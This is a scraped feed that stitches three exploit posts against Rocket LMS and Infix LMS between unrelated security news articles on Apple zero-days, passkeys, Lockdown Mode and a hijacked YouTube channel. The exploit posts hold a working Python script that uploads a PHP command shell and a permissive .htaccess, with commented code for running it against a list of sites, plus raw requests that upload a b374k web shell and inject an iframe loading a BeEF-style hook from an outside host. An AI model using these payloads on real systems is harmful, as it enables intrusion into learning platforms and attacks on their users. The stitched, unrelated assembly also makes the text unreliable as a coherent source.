Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

# Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket: def __init__(self,ssl,host,port,email,password,file): self._url_to_upload = "/panel/setting" self._url_to_login = "/login" self.host = host self.port = port self.ssl = ssl self.email = email self.password = password self.file = file def get_csrf_token(self,client,URL): fromt = client.get(URL) if 'XSRF-TOKEN' in client.cookies: csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0] return csrftoken else: print("Error while fetching token") return def login(self): client = requests.session() if self.ssl == True: ssl= "https://" else: ssl= "http://" URL = str(ssl+self.host+":"+self.port+self._url_to_login) URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload) csrftoken = self.get_csrf_token(client,URL) fromt = client.get(URL) # sets cookie login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel') r = client.post(URL, data=login_data, cookies=client.cookies) self.upload_shell(client,URL2) self.upload_htaccess(client,URL2) def upload_shell(self,client,URL): csrftoken = self.get_csrf_token(client,URL) with open(self.file,"r") as payload: to_base64 = payload.read() to_base64 = str(to_base64).encode("utf-8") base64_encoded_data= base64.b64encode(to_base64) base64_encoded_data = str(base64_encoded_data)[:-1] base64_encoded_data = str(base64_encoded_data)[2:] string = "data:image/php;base64,"+str(base64_encoded_data) data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="") r = client.post(URL, data=data, cookies=client.cookies) print(r.status_code) if r.status_code == 200: print("sent and uploaded shell :"+URL+"\n") else: print("couldn't upload shell") def upload_htaccess(self,client,URL): csrftoken = self.get_csrf_token(client,URL) string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4=" data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="") r = client.post(URL, data=data, cookies=client.cookies) print(r.status_code) if r.status_code == 200: print("sent and uploaded htaccess:"+URL+"\n") print("Go and rename file in filemanager on website") else: print("couldn't upload htaccess") elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")elon.login()#with dork# try:# with open("sites.txt","r") as urls:# url = urls.readlines()# ssl = True# port = 443# for line in url: # try:# if "sslyok" in line:# port = 80# ssl = False# line = str(line.rstrip('%0a')) # print("trying:"+line)# elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")# elon.login()# time.sleep(1) # except Exception:# #traceback.print_exc()# print("atamadim") # finally:# print("okey")# except Exception:# print("atamadim")

Rocket LMS 1.6 Shell Upload

Categories: Exploits and vulnerabilities
Categories: News
Apple has patched an actively-exploited flaw that affects a host of devices and software, including iPhones, Macs, iPads, and iPod touch.



(Read more...)




The post Important update! iPhones, Macs, and more vulnerable to zero-day bug appeared first on Malwarebytes Labs.

Posted: September 13, 2022 by

On Monday, Apple released a long list of patched vulnerabilities to its software, including a new zero-day flaw affecting Macs and iPhones. The company revealed it's aware that threat actors may have been actively exploiting this vulnerability, which is tracked as **CVE-2022-32917**.

As it's a zero-day, nothing much is said about CVE-2022-32917, only that it may allow malformed applications to execute potentially malicious code with kernel privileges. Apple says it's patched this flaw with improved bounds checks. Below is a list of products this bug affects:

*   Macs running macOS Monterey 12.6 and macOS Big Sur 11.7
*   iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

CVE-2022-32917 is the eighth zero-day flaw that Apple has addressed since the beginning of 2022. The first seven are as follows:

*   CVE-2022-32894, a flaw in the iOS Kernel, was patched in August
*   CVE-2022-32893, a flaw in WebKit, was patched in August
*   CVE-2022-22674, an Intel Graphics Driver bug, was patched in March
*   CVE-2022-22675, a bug in AppleACD, was patched in March
*   CVE-2022-22620, a WebKit bug affecting iPhones, Macs, and iPads, was patched in February
*   CVE-2022-22587, a privileged code execution flaw, was patched in January
*   CVE-2022-22594, a web browser activity tracking flaw, was patched in January

As this latest vulnerability is already being exploited, it's really important that you update your devices as soon as you can. Stay safe!

**RELATED ARTICLES**

**ABOUT THE AUTHOR**

Important update! iPhones, Macs, and more vulnerable to zero-day bug

Categories: Apple
Categories: News
With the introduction of passkeys in iOS 16 and macOS Ventura, Apple is poised to sway a trend against the use of passwords.



(Read more...)




The post Apple puts the password on life support with passkey appeared first on Malwarebytes Labs.

Posted: September 13, 2022 by

The "passwordless future" is something many internet users—and a great majority of the cybersecurity industry—have hoped for. Now Apple is about to make those hopes a reality.

With the release of iOS 16 yesterday, and macOS Ventura next month, Apple fans will be able to use passkeys, its password replacement, for iPhones, iPads, and Macs. The word "passkey" is not unique to Apple, however. Microsoft and Google are using the term, too.

Apple's passkey works like a password in that it is built into entry boxes where you put your password. It also acts as a digital key that users create to access their apps or websites.

A video demonstrating passkey's use in Apple's WWDC 2022 event shows a prompt on the user's device before sign-in or during account creation, asking if they would like to "save a passkey" for the account in use. Once users say yes, they are prompted to authenticate the passkey creation using Face ID, Touch ID, or another method. The created passkey is stored in the user's iCloud Keychain and synced across all Apple devices and Safari web browsers.

Whenever a passkey is created, the device's system creates a pair of digital keys: public and secret keys. According to Garrett Davidson, an Apple engineer, in the demo video, these keys are created "securely and uniquely" for every account. The public key is stored on Apple's servers, while the secret key is kept on the device.

When signing in to an account protected by a passkey, the website or app looks for the secret key kept safe on the device to prove that the user is who the user claims they are. And because Apple's passkey is based on passwordless standards defined by the FIDO Alliance, it's likely the passkey can be stored anywhere, including some password managers with a provision for the passkey, such as Dashlane.

Those with other devices besides Apple can still take advantage of passkey. However, how things are done is slightly different because passkeys won't be stored on non-Apple devices. For example, accessing a browser account on a Windows machine would require a user to use a QR code containing a URL to a single-use encryption key and their iPhone. Once scanned, the machine and the device can communicate using end-to-end encryption via Bluetooth and share information.

"That means a QR code sent in an email or generated on a fake website won't work, because a remote attacker won't be able to receive the Bluetooth advertisement and complete the local exchange," Davidson said in the video.

"This has the potential to be _far_ superior to weak passwords and chosen by people who don't use a password manager or don't know how to choose a password," said Thomas Reed, Malwarebytes' Director for Mac & Mobile. "So even if this isn't 100% perfect, it's still going to be better than what most people are doing today."

**RELATED ARTICLES**

Apple puts the password on life support with passkey

Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day flaw that has been used in attacks in the wild.
The issue, assigned the identifier CVE-2022-32917, is rooted in the Kernel component and could enable a malicious app to execute arbitrary code with kernel privileges.
"Apple is aware of a report that this issue may

Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero-day flaw that has been used in attacks in the wild.

The issue, assigned the identifier **CVE-2022-32917**, is rooted in the Kernel component and could enable a malicious app to execute arbitrary code with kernel privileges.

"Apple is aware of a report that this issue may have been actively exploited," the iPhone maker acknowledged in a brief statement, adding it resolved the bug with improved bound checks.

An anonymous researcher has been credited with reporting the shortcoming. It's worth noting that CVE-2022-32917 is also the second Kernel related zero-day flaw that Apple has remediated in less than a month.

Patches are available in versions iOS 15.7, iPadOS 15.7, iOS 16, macOS Big Sur 11.7, and macOS Monterey 12.6. The iOS and iPadOS updates cover iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

With the latest fixes, Apple has addressed seven actively exploited zero-day flaws and one publicly-known zero-day vulnerability since the start of the year -

*   **CVE-2022-22587** (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-22594** (WebKit Storage) - A website may be able to track sensitive user information (publicly known but not actively exploited)
*   **CVE-2022-22620** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-22674** (Intel Graphics Driver) – An application may be able to read kernel memory
*   **CVE-2022-22675** (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32893** (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-32894** (Kernel) - An application may be able to execute arbitrary code with kernel privileges

Besides CVE-2022-32917, Apple has plugged 10 security holes in iOS 16, spanning Contacts, Kernel Maps, MediaLibrary, Safari, and WebKit. The iOS 16 update is also notable for incorporating a new Lockdown Mode that's designed to make zero-click attacks harder.

iOS further introduces a feature called Rapid Security Response that makes it possible for users to automatically install security fixes on iOS devices without a full operating system update.

"Rapid Security Responses deliver important security improvements more quickly, before they become part of other improvements in a future software update," Apple said in a revised support document published on Monday.

Lastly, iOS 16 also brings support for passkeys in the Safari web browser, a passwordless sign-in mechanism that allows users to log in to websites and services by authenticating via Touch ID or Face ID.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Apple Releases iOS and macOS Updates to Patch Actively Exploited Zero-Day Flaw

By Waqas
Scuba Jake, whose real name is Jake Koehler, had his YouTube channel "DALLMYD" with 13 million subscribers hacked to steal 1.01 BTC.
This is a post from HackRead.com Read the original post: Popular YouTuber Scuba Jake’s channel hacked to run crypto scam

YouTube is frequently targeted in hacks especially to carry out **crypto scams**. The severity of crypto scams on YouTube can be quantified by the fact that in July 2020, Apple co-founder **Steve Wozniak ended up suing** Google and YouTube over Bitcoin giveaway scams being carried out in his name.

Now, another viral YouTuber Jake Koehler (aka Scuba Jake) has suffered a similar hack in which his channel “**DALLMYD**” was compromised to run a crypto scam and steal funds from his subscribers.

It is worth noting that Jake’s channel has more than 13 million subscribers and boasts 1.75 billion views since its creation in 2011. The American YouTuber is known for uploading scuba-diving videos where he goes underwater on treasure hunts and finds/returns lost items including smartphones, gadgets, and jewelry.

Archive video of Scuba Jake’s YouTube channel

According to the financial news and crypto analysis blog **Finbold**, the hacking occurred on September 9th, 2022. Reportedly, crypto scammers hijacked the channel and tried to defraud innocent followers of Scuba Jake in a **fake giveaway scheme** involving cryptocurrencies Bitcoin and Ethereum.

What’s worse, apparently scammers managed to steal 1.01 BTC (around $21,000). This analysis was based on the QR codes scammers shared with users to scan before sending crypto.

On the other hand, a look at Blockchain.com confirms that the **scammers’ Bitcoin wallet** shared with users received four transactions, and since its creation, it has received around 1.0107 BTC. That’s the same amount the scammers stole from Jake’s subscribers, but it may be higher because the scammers might have used multiple wallets during the live stream. It is worth noting that no transaction was made in the **Ethereum** wallet.

Scammers also changed Jake’s channel name to MicroStrategy US to replicate the firm MicroStrategy, a USA’s crypto-friendly business intelligence firm. Scammers hosted two live streams of an old video showcasing ex-CEO of the company and Bitcoin enthusiast Michael Saylor.

The scammers deceived unsuspecting subscribers of Jake into sending cryptocurrency and receiving a prize or higher reward from Saylor. They targeted the channel because of Jake’s massive following.

Although Jake has already confirmed the hack on his Instagram story but at the time of writing his channel was unavailable to viewers. A search for his YouTube channel shows video collaboration with other YouTubers while his channel is nowhere to be found on YouTube.

1.  **Botnet found using YouTube to illegally mine cryptocurrency**
2.  **Popular YouTube gaming channel hacked to run crypto scam**
3.  **YouTube deletes 2 million channels and 51 million videos over scams**
4.  **YouTube scammers impersonated Elon Musk, SpaceX; stole $150k in BTC**
5.  **British Military’s Twitter and YouTube Accounts Hacked to Scam Crypto Users**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Popular YouTuber Scuba Jake’s channel hacked to run crypto scam

Infix LMS version 4.3.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Infix LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608# Version: 4.3.0# Tested on Ubuntu 18.04sign up as teachergo profile page and try to upload profile picwith bypass name restriction on post request with burp or etc, upload b374k with burp or else -------Request-----------POST /profile-update HTTP/1.1Host: localhostContent-Length: 102201Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzjX6L4V6hVC4KIECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/profile-settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ijhpc05lZDlpcElOM1ZJZ0sxZDBXSUE9PSIsInZhbHVlIjoiVXRsZGNUNVlGWXY5RVpxTDVPK08wQW5TK05RMmUvRUVYKzQ0L0R0cHpyZmhmUFFHVm04ZWo2UVVUYkNuYm15c3RrcUlzQnJySnBWUHdHOGF6NkVneUNibDZxbEc1MytrWVRzVDVhaDNOYjN1ZGI1aHFEd3B2VXgrczZrUjEzR2QiLCJtYWMiOiJkNTZmNTU3YzU0NzJlNzJhMWIwMWNmMDhjMjI2ZTEzZjgwMDY0Mzk1ZjRiMWNhZjczZjhmNTQyN2NiNWZhMTdjIiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6InBSSllCaHF1UFlLS0dpT3RYaHRkRkE9PSIsInZhbHVlIjoiYlI3ak1obGtEa1hiV1hhOEF4V2Y1RjVTQmJHVjdvRmUrRmM0aE4wcElycHRCWnNVeG5LSVJBb3A1SDBXaU9mUzZTZ2EvSDZTZ00vRmZUbXZXZ2UzK3BsMlRJVDlJSThpRGc0SEEvZmh5cmtHSkhDWGNTOCtEcFdkaGEwdjhpOHAiLCJtYWMiOiI0NjJhMTRjNjIyMWQyM2MxZDliOGIzYjNmZmQ5YjA1YWVmYjUzZjhjMmI2MjAwNTFiZGNlN2RiMmUyMzhlZDFhIiwidGFnIjoiIn0%3DConnection: close------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="_token"0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="name"Teacher------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="email"teacher@infixedu.com------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="phone"01711223345------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="country"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="city"1374------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="zip"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="currency"112------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="language"19------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="facebook"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="twitter"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="linkedin"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="instagram"------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="short_details"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="about"Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzjX6L4V6hVC4KIECContent-Disposition: form-data; name="image"; filename="shell.php.jpg.php"Content-Type: image------b374kshell content-----------WebKitFormBoundaryzjX6L4V6hVC4KIEC--

Infix LMS 4.3.0 Shell Upload

Infix LMS version 4.3.0 suffers from an iframe injection vulnerability.

# Exploit Title: Infix LMS - Learning Management System IFRAME Injection 
# Exploit Author: th3d1gger 
# Vendor Homepage: https://codecanyon.net 
# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608 
# Version: 4.3.0 
# Tested on Ubuntu 18.04 
sign up as teacher 
go course page and try to add course or edit 
with bypass special char restrict on post request with burp or etc, inject iframe with beef hook or else on any note-editor field

--request-- 
POST /admin/course/updateCourse HTTP/1.1 
Host: localhost 
Content-Length: 3855 
Cache-Control: max-age=0 
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" 
sec-ch-ua-mobile: ?0 
sec-ch-ua-platform: "Linux" 
Upgrade-Insecure-Requests: 1 
Origin: http://localhost 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydcMGShie2VwdqOn2 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Sec-Fetch-Site: same-origin 
Sec-Fetch-Mode: navigate 
Sec-Fetch-User: ?1 
Sec-Fetch-Dest: document 
Referer: http://localhost/admin/course/course-details/7?type=courseDetails 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.9 
Cookie: XSRF-TOKEN=eyJpdiI6IlhIUjU2U3FiTUMzQzZxT2E0OVVhZ1E9PSIsInZhbHVlIjoiRDBWUnFuakRhbTlHMStIb0xaRGp3YndQY3lla0RWcjZ2N3VyUUZMUzU1M004azBNNFk2QlBQNnJGSzRxWnh3bVppZ1hBcmRaOEV3TWd0L2V3R3FXcTZTQVpMQWxFSXQvOE00a3NZK0tjaDNqNzJ4ckdQc2psN2tMUzJaK3kzaDgiLCJtYWMiOiIxMjNjZTExZGE1MzUzNmQ0ZGMxMzk3Y2Y5NmEwMjZjNjdhZDEyNDU5ODYwYTVhZTZjM2UwN2VhNzZiMGY0OTI5IiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6Im1hSEwwZ3ZlbGJUVGpqTFJLSEdkOGc9PSIsInZhbHVlIjoiSUNJbDZMbmNLSWVlWm1OU3BqYVpYYTkzK3BVN0xxaG1qZnpCVis1TjAwd1FRV3RKUlRNbGdleUhaUWRpdXMwTmxtMFJjc3BTUTV2Ty9zLzkyTWZBckpRTUlsVEc1dmlVbzRwOHRhdW1nSWpNdkRnbmNUMGFqZFUyVml2UDBDclMiLCJtYWMiOiIzZjBmNjVlNDg0MjFmN2NiYjI3ZmIxNmM0YjlkMjE1MGZjZTVlN2Y5N2JmYTcwOWM1ZDA2ZmU4MzIzYzI2YTExIiwidGFnIjoiIn0%3D 
Connection: close

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="_token"

0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="type"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="drip"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="title"

Introduction to Programming and App Development 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="id"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="requirements"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="about"

 <iframe src="http://192.168.1.18:3000/uploads/test.html"><div> </div> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text 
 ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="outcomes"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="category"

4 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="sub_category"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="mode_of_delivery"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="quiz"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="level"

2 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="language"

19 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="duration"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="complete_order"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="price"

20 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="is_discount"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="discount_price"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="host"

Youtube 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="trailer_link"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vimeo"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vdocipher"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="file"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="scope"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="image"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundarydcMGShie2VwdqOn2--

Infix LMS 4.3.0 IFRAME Injection

Safety Check and Lockdown Mode give people in vulnerable situations ways to quarantine themselves from acute risks.

Apple has long said that it offers software that is secure and private enough for all users by default, without special tiers or paid services. As digital threats to its users expand, though, the company has had to evolve this philosophy. And today's release of iOS 16 comes with two new features meant to help protect people facing very specific crises in their lives.

Safety Check and Lockdown Mode are very different tools, but Apple has built them both into its latest mobile operating system release as lifelines for digital worst-case scenarios. 

Apple designed Safety Check as a feature for users who are at risk for, or currently experiencing, domestic abuse. The tool centralizes a number of controls in one place to make it easier for users to manage and revoke access to their location data and reset privacy-related permissions. Lockdown Mode, on the other hand, is meant for users who potentially face targeted spyware attacks and aggressive state-backed hacking. The feature comprehensively restricts any nonessential iOS features so there are as few potential points of entry to a device as possible. As more governments and repressive entities around the world have begun purchasing powerful commodity spyware to target individuals of particular importance or interest, iOS's general security defenses haven't been able to keep pace with these specialized threats.

“I do think that things like Lockdown Mode and Safety Check are good,” says Thomas Reed, director of Mac and mobile platforms at the antivirus maker Malwarebytes. “People criticize Apple for not opening up iOS enough, and those folks would say this is just a token effort to silence critics. I don’t agree, though. For the nation-state-type stuff and risks users may be facing from people close to them, I think these new features will absolutely help within the paradigm of Apple’s current security model.”

Many mobile security researchers, including Reed, see major tradeoffs in Apple's philosophical approach to securing iOS. The mobile operating system is extremely locked down and can't be monitored for suspicious activity the way other operating systems can be. The benefit of this is that attackers are boxed out in the same way defenders are, but when hackers find and exploit a vulnerability, they can do it without being seen. Given this premise, the creation of purpose-built protective tools like Safety Check and Lockdown Mode is not just a logical progression but a necessary one.

“The more Apple locks down iOS to improve end user security, the harder it becomes for the security research community to investigate and identify vulnerabilities,” says Amanda Gorton, CEO of the of the mobile virtualization company Corellium. “I think it's commendable that Apple is taking measures to address security threats that are only ever likely to impact a tiny fraction of its user base.”

For iOS users dealing with harassment or abuse at home, Safety Check offers a few options to take back some digital control. For a user who has concerns and wants to rein in the access other people may have to their location information and other data, Safety Check offers a tool called Manage Sharing & Access. This tool details the people and apps that have access to different information, like who is connected through Find My Friends or which apps can use a device's microphone. It also includes walkthroughs so users can review their security settings. The Emergency Reset feature, meanwhile, is like a panic button if you think someone has gotten access to your device and set it so you are easier to track and surveil. Emergency Reset can revoke all access at once, resetting privacy permissions, signing you out of iCloud on all other devices, and limiting where your account can send and receive texts through Messages.

Apple says that “Safety Check can be helpful to users whose personal safety is at risk from domestic or intimate partner violence by quickly removing all access they’ve granted to others." 

To access the features, go to **Settings**, then **Privacy & Security**, and then **Safety Check**. 

